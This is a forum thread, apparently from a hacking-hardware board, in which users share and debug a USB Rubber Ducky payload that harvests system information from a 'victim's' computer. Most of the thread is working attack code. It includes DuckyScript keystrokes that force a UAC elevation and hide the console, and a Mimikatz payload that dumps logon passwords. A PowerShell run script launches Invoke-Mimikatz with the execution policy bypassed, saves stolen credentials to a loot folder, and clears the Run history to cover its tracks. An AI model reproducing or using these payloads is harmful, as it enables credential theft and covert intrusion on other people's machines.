MrSnowMonster Posted November 3, 2016 Share Posted November 3, 2016 (edited) !! EDIT !! !! Now updated so it should be very fast and effective !! !! This is a remake of my bashbunny script so it works on the rubberducky too https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber !! Hello everyone! I made this nice script that gives you a lot of information about your victims computer and stores it on the rubberducky if it runs twin duck firmware. for example their ip and public ip Change it as much as you want, but please make me as source since I spent around 15 hours on this It executes in around 6 seconds :) It also finds more information than it did before :) Just drag the files i upload into your rubberducky running twin duck firmware. You can also see the inject.txt in there so you can convert it to the language you want :) The rubberducky also has to have the name DUCKY for this script to work, because the command it runs is searching for a usb with the name DUCKY. Rememeber this only works if you use the twin duck firmware on you rubberducky. :) The information you grab from you victim will be saved inside a folder called Loot. You can either download the files from my github https://github.com/MrSnowMonster/MrSnows-SnowGlobe/tree/master/Tech/Hacking and Pentesting/RubberDucky/Infograbber rubberducky version or download the rar file I uploaded here. :) info.zip Edited May 22, 2017 by MrSnowMonster Made a few changes to make it more accurate Quote Link to comment Share on other sites More sharing options...
Enzym3 Posted November 8, 2016 Share Posted November 8, 2016 I haven't tested it out, but just from quickly scrolling through the code I see a handful of ways to refactor the code and speed it up. It's also always a good idea to run any shell as administrator to avoid errors with user privileges. Lastly, if you choose to go the route of pressing 'ALT + Y' to select the 'Yes' option for the UAC popup, you should always account for any victim's system that has UAC disabled. If you don't account for them, whenever you do encounter one, the very first character typed into the shell will be a lowercase 'y'. Everything following will be rendered effectively useless. There are a few options to easily deal with that. The route I choose to go is: REM -- This would be the beginning of the script. 2 second delay to allow USB to enumerate in victim's PC. DELAY 2000 REM -- Press Win + R to open 'Run'. GUI R DELAY 100 REM -- Start Powershell as administrator (alternatively you can substitute 'CMD' if you prefer). STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 300 REM -- Press 'ALT + Y' to choose 'Yes' option for UAC dialog box. ALT y DELAY 300 REM -- To account for any victim with UAC disabled, cursor will shift left once and press 'DELETE' to remove lowercase 'y' from the shell. REM -- Any victim with UAC enabled, pressing LEFTARROW + DELETE effectively does nothing, which allows us to account for both scenarios. LEFTARROW DELETE <...> Overall, nice work. I'll check it out in a bit to see how it performs :) Happy hacking! -Enzym3 Quote Link to comment Share on other sites More sharing options...
Enzym3 Posted November 8, 2016 Share Posted November 8, 2016 Nice :) About how long does it take for the ducky to deliver the payload before you're able to remove it? Quote Link to comment Share on other sites More sharing options...
bananacake Posted May 21, 2017 Share Posted May 21, 2017 On 11/9/2016 at 7:37 PM, MrSnowMonster said: @Enzym3 I made it faster with some few tweaks so it should now take under 30 seconds :) Your old Github links don't work. Mind sharing your new tweaked payload again? Thankyou. Quote Link to comment Share on other sites More sharing options...
MrSnowMonster Posted May 21, 2017 Author Share Posted May 21, 2017 (edited) 57 minutes ago, bananacake said: Your old Github links don't work. Mind sharing your new tweaked payload again? Thankyou. Hey! I no longer have this script because I started using The twin duck firmware and made my bashbunny script work on the rubberducky. :) It still does the same, but because of the twin duck firmware you no longer have to send the information through mail, and it is A LOT faster. It executes in around 6 seconds :) It also finds more information than it did before :) Just drag the files i upload into your rubberducky running twin duck firmware. You can also see the inject.txt in there so you can convert it to the language you want :) The rubberducky also has to have the name DUCKY for this script to work, because the command it runs is searching for a usb with the name DUCKY. Hope this helps :) !!Edit!! Rememeber this only works if you use the twin duck firmware on you rubberducky. :) The information you grab from you victim will be saved inside a folder called Loot. !!Edit!! You can either download the files from my github https://github.com/MrSnowMonster/MrSnows-SnowGlobe/tree/master/Tech/Hacking and Pentesting/RubberDucky/Infograbber rubberducky version or download the rar file I uploaded here. :) info.zip Edited May 21, 2017 by MrSnowMonster Quote Link to comment Share on other sites More sharing options...
bananacake Posted May 22, 2017 Share Posted May 22, 2017 Thanks a bunch SnowMonster. This script is excellent and works perfectly. I wonder if it would be possible to add mimikatz to the payload after the information gathering stage. Other mimikatz payloads first start cmd.exe as admin before executing mimikatz through powershell commands. For example: DELAY 2000 GUI r DELAY 500 STRING powershell Start-Process cmd.exe -verb runAs ENTER DELAY 2000 ALT y DELAY 500 CTRL C REM *** Obfuscate the command prompt *** STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM *** Define Ducky Drive as DUCK *** STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Run Mimikatz from Ducky Drive *** STRING powershell %duck%\im.ps1 -DumpCreds >> %duck%\%computername%-passwords.txt ENTER DELAY 100 STRING privilege::debug ENTER STRING sekurlsa::logonPasswords full ENTER DELAY 10000 STRING exit ENTER DELAY 5000 REM *** Clear duck variable, history, and GTFO *** STRING set "duck=" ENTER DELAY 100 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER DELAY 100 STRING color 08 ENTER DELAY 100 STRING exit ENTER As you can see this is slower then simply executing several pre-made powershell files and requires admin cmd to start (which may be restricted in corporate environments.) I am wondering if it is possible to cut this stage out entirely and create a payload similar to your information gathering payload? Thanks again. Quote Link to comment Share on other sites More sharing options...
MrSnowMonster Posted May 22, 2017 Author Share Posted May 22, 2017 (edited) 43 minutes ago, bananacake said: Thanks a bunch SnowMonster. This script is excellent and works perfectly. I wonder if it would be possible to add mimikatz to the payload after the information gathering stage. Other mimikatz payloads first start cmd.exe as admin before executing mimikatz through powershell commands. For example: DELAY 2000 GUI r DELAY 500 STRING powershell Start-Process cmd.exe -verb runAs ENTER DELAY 2000 ALT y DELAY 500 CTRL C REM *** Obfuscate the command prompt *** STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM *** Define Ducky Drive as DUCK *** STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Run Mimikatz from Ducky Drive *** STRING powershell %duck%\im.ps1 -DumpCreds >> %duck%\%computername%-passwords.txt ENTER DELAY 100 STRING privilege::debug ENTER STRING sekurlsa::logonPasswords full ENTER DELAY 10000 STRING exit ENTER DELAY 5000 REM *** Clear duck variable, history, and GTFO *** STRING set "duck=" ENTER DELAY 100 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER DELAY 100 STRING color 08 ENTER DELAY 100 STRING exit ENTER As you can see this is slower then simply executing several pre-made powershell files and requires admin cmd to start (which may be restricted in corporate environments.) I am wondering if it is possible to cut this stage out entirely and create a payload similar to your information gathering payload? Thanks again. This is very easy to do, just make a script file which holds the mimikatz code and place this code in the run.ps1 script file in the payloads folder :) The code: "PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1" remember to remove the " thingy :) A little info abouth why this works. The code bypases windows script policy so it wont need to allow scipts to run and in this way makes it possible to run scripts without using an administrator account :) Your welcome! Always fun to know people find the help I give and things I create usefull! :D !!EDIT!! If I were you I would look at the run.ps1 script and see if I could understand how it works. It may help you later, because its a great way to bypass a lot of uneccesary typing. :D Remember to remove the last string in run.ps1 if you want to change it so it only runs mimikatz Edited May 22, 2017 by MrSnowMonster Quote Link to comment Share on other sites More sharing options...
bananacake Posted May 22, 2017 Share Posted May 22, 2017 28 minutes ago, MrSnowMonster said: This is very easy to do, just make a script file which holds the mimikatz code and place this code in the run.ps1 script file in the payloads folder :) The code: "PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1" remember to remove the " thingy :) A little info abouth why this works. The code bypases windows script policy so it wont need to allow scipts to run and in this way makes it possible to run scripts without using an administrator account :) Your welcome! Always fun to know people find the help I give and things I create usefull! :D !!EDIT!! If I were you I would look at the run.ps1 script and see if I could understand how it works. It may healp you later, because its a great way to bypass a lot of uneccesary typing. :D Thanks for such a quick reply :D Send me your bitcoin address or paypal in a PM for a little donation. I have already been fiddling with the run.ps1 before your post. Unfortunately not had any luck so far. I added mimikatz.ps1 to the payloads folder (https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1) I have made the following changes to run.ps1: #Remove run history powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" #Get the path and file name that you are using for output # find connected bashbunny drive: $VolumeName = "DUCKY" $computerSystem = Get-CimInstance CIM_ComputerSystem $backupDrive = $null get-wmiobject win32_logicaldisk | % { if ($_.VolumeName -eq $VolumeName) { $backupDrive = $_.DeviceID } } #See if a loot folder exist in usb. If not create one $TARGETDIR = $backupDrive + "\loot" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #See if a info folder exist in loot folder. If not create one $TARGETDIR = $backupDrive + "\loot\info" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #See if a passwords folder exist in loot folder. If not create one $TARGETDIR = $backupDrive + "\loot\passwords" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #Create a path that will be used to make the file $datetime = get-date -f yyyy-MM-dd_HH-mm $backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt" $passwordPath = $backupDrive + "\loot\passwords\" + "passwords" + ".txt" #Create output from info script $TARGETDIR = $MyInvocation.MyCommand.Path $TARGETDIR = $TARGETDIR -replace ".......$" cd $TARGETDIR PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts >> $passwordPath When I run run.ps1 info.ps1 executes correctly as usual, afterwards a new powershell window is opened and a passwords folder is created along with a passwords.txt file. However the passwords.txt file is empty. I'm pretty sure mimikatz is running as my cursor displays a loading timer icon, it's just not outputting the file correctly and I'm not sure exactly what to do to fix this. Any help is appreciated. Thankyou. Quote Link to comment Share on other sites More sharing options...
MrSnowMonster Posted May 22, 2017 Author Share Posted May 22, 2017 7 minutes ago, bananacake said: Thanks for such a quick reply :D Send me your bitcoin address or paypal in a PM for a little donation. I have already been fiddling with the run.ps1 before your post. Unfortunately not had any luck so far. I added mimikatz.ps1 to the payloads folder (https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1) I have made the following changes to run.ps1: #Remove run history powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" #Get the path and file name that you are using for output # find connected bashbunny drive: $VolumeName = "DUCKY" $computerSystem = Get-CimInstance CIM_ComputerSystem $backupDrive = $null get-wmiobject win32_logicaldisk | % { if ($_.VolumeName -eq $VolumeName) { $backupDrive = $_.DeviceID } } #See if a loot folder exist in usb. If not create one $TARGETDIR = $backupDrive + "\loot" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #See if a info folder exist in loot folder. If not create one $TARGETDIR = $backupDrive + "\loot\info" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #See if a passwords folder exist in loot folder. If not create one $TARGETDIR = $backupDrive + "\loot\passwords" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #Create a path that will be used to make the file $datetime = get-date -f yyyy-MM-dd_HH-mm $backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt" $passwordPath = $backupDrive + "\loot\passwords\" + "passwords" + ".txt" #Create output from info script $TARGETDIR = $MyInvocation.MyCommand.Path $TARGETDIR = $TARGETDIR -replace ".......$" cd $TARGETDIR PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts >> $passwordPath When I run run.ps1 info.ps1 executes correctly as usual, afterwards a new powershell window is opened and a passwords folder is created along with a passwords.txt file. However the passwords.txt file is empty. I'm pretty sure mimikatz is running as my cursor displays a loading timer icon, it's just not outputting the file correctly and I'm not sure exactly what to do to fix this. Any help is appreciated. Thankyou. Try using PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts > $passwordPath Not really sure what the problem is but looks like you may have one > too much :) If i were you I would try to run the line in a powershell command window and see if there is any errors showing up :D You could also try to remove the -DumpCerts :) Just happy to help, finally had a break from my exams so I use the time to code :P Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.